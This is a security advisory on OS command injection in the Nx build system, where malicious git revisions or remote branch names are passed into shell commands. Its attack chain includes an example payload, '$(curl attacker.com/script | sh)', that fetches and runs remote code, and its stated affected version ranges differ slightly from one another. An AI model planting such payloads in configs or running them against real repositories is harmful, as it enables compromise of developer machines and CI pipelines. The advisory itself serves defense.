OS Command Injection in Nx via Git Revisions and Remote Refs
The Nx build system contains OS command injection vulnerabilities in `nx affected` and `nx import` commands, allowing attackers to execute arbitrary code via malicious git revision strings or remote branch names.
What's new
- 1. added coverage for nx (14.6.0-22.7.8, 23.0.0-23.1.1) Oct 6, 00:45 via ghsa
Nx core is vulnerable to multiple OS command injection flaws where untrusted git inputs are interpolated into shell command strings. The vulnerabilities exist in two primary workflows: affected commands and nx import. In the affected workflow, values from nx.json (defaultBase / affected.defaultBase) or the NX_BASE / NX_HEAD environment variables are used to construct git commands. Because these strings are processed by /bin/sh without proper sanitization, an attacker can inject command substitution payloads using $(...) syntax, even when wrapped in double quotes.
In the nx import workflow, the GitRepository helper interpolates remote branch names - controlled by the owner of a remote repository - into various git operations including fetch, checkout, and config. An attacker who controls a repository can force arbitrary command execution on any machine that runs an nx command against it. This is particularly critical in CI/CD environments where pull requests containing modified nx.json files are automatically processed by runners. This vulnerability affects Nx versions >= 14.0.0 and < 22.7.8, and versions 23.0.0 to 23.1.0.
Attack Chain
- Attacker crafts a malicious repository or a pull request containing a manipulated
nx.jsonfile. - The attacker modifies the
defaultBaseoraffected.defaultBasefield innx.jsonto include shell command substitution payloads (e.g.,$(curl attacker.com/script | sh)). - A victim (developer or CI/CD runner) clones the repository or fetches the attacker's pull request branch.
- The victim executes a standard Nx command, such as
nx affectedornx show projects --affected. - The Nx CLI reads the manipulated
nx.jsonconfiguration and builds agit merge-baseorgit diffshell command string containing the malicious payload. - The system executes the resulting string via
/bin/sh, triggering the command substitution and executing the attacker's code. - The attacker's payload executes with the privileges of the victim user or CI service account.
Impact
Successful exploitation allows for arbitrary command execution on developer workstations or CI/CD build servers. If triggered in a CI environment, this could lead to full compromise of the build pipeline, exfiltration of environment secrets (e.g., cloud credentials, API keys), or the injection of malicious code into downstream software artifacts. There are no known instances of exploitation in the wild at this time, but the vector is highly accessible to anyone capable of submitting a pull request to an Nx-based project.
Recommendation
Prioritized actions for security teams:
- Upgrade all instances of
nxto version 22.7.8 or 23.1.1 immediately using thenx migratecommand. - For CI/CD environments, audit build configurations to ensure that
nx.jsonfiles from untrusted sources or external pull requests are treated as untrusted and not processed automatically in privileged contexts. - Monitor CI/CD logs for unexpected child processes spawned by the
nxCLI or relatedgitsub-processes. - Restrict
nx importusage to verified and trusted repositories only.
Immediate actions
Upgrade nx package to 22.7.8 or 23.1.1
Mitigations
Review and restrict processing of untrusted pull requests in CI/CD
Arbitrary command execution in CI